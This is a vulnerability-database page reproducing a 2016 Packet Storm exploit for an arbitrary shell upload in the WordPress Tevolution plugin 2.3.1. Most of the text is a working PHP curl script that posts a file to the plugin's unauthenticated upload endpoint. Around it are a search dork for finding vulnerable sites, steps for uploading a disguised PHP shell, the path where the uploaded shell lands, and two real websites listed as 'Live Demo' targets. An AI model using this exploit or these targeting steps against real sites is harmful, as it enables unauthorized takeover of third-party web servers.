Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Tevolution 2.3.1 Shell Upload

🗓️ 16 Aug 2016 00:00:00Reported by xBADGIRL21Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 35 Views

WordPress Tevolution 2.3.1 Arbitrary Shell Upload Vulnerability, enables custom post types, allows remote file uploa

Code
`######################  
# Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability  
# Exploit Author : xBADGIRL21  
# Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector  
# Vendor Homepage : https://templatic.com/  
# version : 2.3.1  
# Tested on: [ BackBox ]  
# skype:xbadgirl21  
# Date: 15/08/2016  
# video Proof : https://youtu.be/eVjW6rnaoSY  
######################  
# [+] DESCRIPTION :  
######################  
# [+] The Tevolution WordPress plugin enables advanced functionality in our themes.  
# [+] Some of the features it enables include custom post types, monetization options, custom fieldsa|  
# [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below.  
# [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory  
######################  
# [+] USAGE :  
######################  
# 1.- Download or Copy the Exploit C0des  
# 2.- Use Dork and Choose One Of the Website  
# 3.- Edit The Script  
# 4.- Upload Your File : shell.php.jpg or shell.php.txt  
######################  
# [+] Exploit:  
######################  
<?php  
$uploadfile="x21.PhP.Txt"; ///xBADGIRL21 ! Removing my name Doesn't mean  
you are the Founder or Owner of this ^_^  
$ch = curl_init("  
http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php  
");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('file'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
?>  
######################  
# [+] Dev!l Path :  
######################  
#  
http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt  
######################  
# [+] Live Demo :  
######################  
# http://guiagronicaragua.com  
# http://eventsinsuriname.com  
######################  
# Discovered by : xBADGIRL21 - Unkn0wN  
# Greetz : All Mauritanien Hackers - NoWhere  
#######################  
### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't  
Want me to Write His Name  
# so I Just Write the Exploit C0des ...........  
#######################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Aug 2016 00:00Current
7.4High risk
Vulners AI Score7.4
wordpresstevolutionarbitrary shell uploadcustom post typesremote attackersfile uploadexploit discovered
35